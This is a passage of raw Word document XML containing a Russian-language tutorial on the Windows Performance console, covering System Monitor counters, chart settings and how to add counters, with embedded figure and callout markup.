        <w:t xml:space="preserve">Чтобы запустить ее, откройте папку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панель управления (</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск&gt;Панель управления&gt;Администрирование</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и щелкнув на значке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Это средство позволяет контролировать загрузку процессора, распределение оперативной памяти, обмен данными между дисками и другие параметры вычислительной системы. Результаты наблюдения можно отображать на экране в виде графиков или записывать в протокольный файл. Исследование компьютера с применением такого средства позволяет находить </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>узкие места</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в производительности компью</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>терной системы, сравнивать между собой варианты настройки аппаратных и программных средств.</w:t>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szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">После загрузки окна программы </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на левую панель выводится дерево консоли. Объекты дерева консоли называются </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>узлами</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Консоль </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит два узла: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Системный монитор</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Журналы и оповещения производительности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="001B566C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1917750" cy="1354691"/>
            <wp:effectExtent l="19050" t="0" r="630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64" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1921104" cy="1357060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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szCs w:val="24"/>
        </w:rPr>
        <w:t>В нижней панели системного монитора по умолчанию отображаются данные трех следующих счетчиков (они являются и одними из самых полезных).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обмен страниц в сек</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Показывает количество страниц, полученных с диска из-за необходимости обращения к этим страницам или записанных на диск для освобождения оперативной памяти. Эта величина включает страничный обмен (подкачку) для доступа к файлам данных приложений. Небольшое значение этого параметра (менее 20), отмеченное при пиковой нагрузке системы, свидетельствует о том, что компьютер не располагает достаточным объемом оперативной памяти для обеспечения устойчивой работы всех компонентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Средняя длина очереди диска</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Показывает количество блоков данных, ожидающих записи на жесткий диск. Значение этого параметра не должно превышать число 2 плюс число </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>установленных в компьютере физических жестких дисков. Превышение этой величины означает, что скорость передачи данных слишком низкая.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>% загруженности процессора</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Показывает процент времени, затрачиваемого центральным процессором на выполнение инструкций активных потоков задач.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56D78">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1045" style="position:absolute;left:0;text-align:left;margin-left:112.3pt;margin-top:151.1pt;width:211.4pt;height:32.3pt;z-index:251661312" filled="f" strokecolor="red" strokeweight="2pt"/>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00B56D78">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1046" style="position:absolute;left:0;text-align:left;margin-left:37.05pt;margin-top:151.1pt;width:67.9pt;height:29.5pt;z-index:251662336" stroked="f">
            <v:textbox>
              <w:txbxContent>
                <w:p w:rsidR="00C23A43" w:rsidRPr="006A4E49" w:rsidRDefault="00C23A43" w:rsidP="006A4E49">
                  <w:pPr>
                    <w:ind w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A4E49">
                    <w:rPr>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Базовые счетчики</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="004B6AD5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3825750" cy="2527200"/>
            <wp:effectExtent l="19050" t="0" r="330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64" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3825750" cy="2527200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждый счетчик представлен на панели системного монитора цветными графиками и числовыми значениями. </w:t>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szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для просмотра данных отсчетов используются диаграммы и гистограммы, выбираемые щелчком на соответствующей кнопке панели инструментов, расположенной на панели системного монитора. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1406550" cy="538259"/>
            <wp:effectExtent l="19050" t="0" r="315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65" cstate="print"/>
                    <a:srcRect l="39769" t="48216" r="27838" b="34030"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1408881" cy="539151"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Над столбцами расположена </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>строка значений</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, в которой отображаются последнее, минимальное, максимальное и среднее значения текущего выбранного счетчика. Эти значения вычисляются за период времени и по выборке, определяемым значением поля </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Длительность</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не за все время с момента начала наблюдения. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Значение поля </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Длительность</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> определяет общее время, показанное на диаграмме, которое связано со значением интервала обновления. Перемещение </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>линии таймера</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> вдоль диаграммы показывает течение интервалов обновления. Независимо от интервала обновления на диаграмме отображается не более 100 значений. Данные журнала сжимаются с тем, чтобы их можно было разместить в окне.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавить новые счетчики можно следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Щелкнуть на значке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Добавить)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, расположенной на панели инструментов системного монитора. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавить счетчики</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контекстном меню системного монитора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="00E656E5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56D78">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>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50" type="#_x0000_t47" style="position:absolute;left:0;text-align:left;margin-left:47.4pt;margin-top:145.85pt;width:1in;height:50.35pt;z-index:251666432" adj="30030,4161,23400,3861,29535,2252,31530,4161">
            <v:textbox>
              <w:txbxContent>
                <w:p w:rsidR="00C23A43" w:rsidRPr="00E656E5" w:rsidRDefault="00C23A43" w:rsidP="00E656E5">
                  <w:pPr>
                    <w:ind w:firstLine="0"/>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00E656E5">
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Кнопка добавления счетчика</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <o:callout v:ext="edit" minusx="t" minusy="t"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00B56D78">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1048" type="#_x0000_t47" style="position:absolute;left:0;text-align:left;margin-left:43.85pt;margin-top:83.95pt;width:1in;height:52.5pt;z-index:251664384" adj="30255,4299,23400,3703,29745,9504,31740,11335">
            <v:textbox>
              <w:txbxContent>
                <w:p w:rsidR="00C23A43" w:rsidRPr="00E656E5" w:rsidRDefault="00C23A43" w:rsidP="00E656E5">
                  <w:pPr>
                    <w:ind w:firstLine="0"/>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00E656E5">
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Выбор счетчика из списка</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <o:callout v:ext="edit" minusx="t" minusy="t"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00B56D78">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1047" type="#_x0000_t47" style="position:absolute;left:0;text-align:left;margin-left:40.6pt;margin-top:13.35pt;width:75.25pt;height:61.05pt;z-index:251663360" adj="29465,16806,23322,3184,29393,16487,31302,18062">
            <v:textbox>
              <w:txbxContent>
                <w:p w:rsidR="00C23A43" w:rsidRPr="00E656E5" w:rsidRDefault="00C23A43" w:rsidP="00E656E5">
                  <w:pPr>
                    <w:ind w:firstLine="0"/>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00E656E5">
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Выбор объекта наблюдения</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <o:callout v:ext="edit" minusx="t" minusy="t"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00B56D78">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1051" type="#_x0000_t47" style="position:absolute;left:0;text-align:left;margin-left:404.8pt;margin-top:83.15pt;width:69.65pt;height:41.85pt;z-index:251667456" adj="-14700,5006,-1861,4645,-16762,2710,-14700,5006">
            <v:textbox>
              <w:txbxContent>
                <w:p w:rsidR="00C23A43" w:rsidRPr="00E656E5" w:rsidRDefault="00C23A43" w:rsidP="00E656E5">
                  <w:pPr>
                    <w:ind w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00E656E5">
                    <w:rPr>
                      <w:sz w:val="20"/>
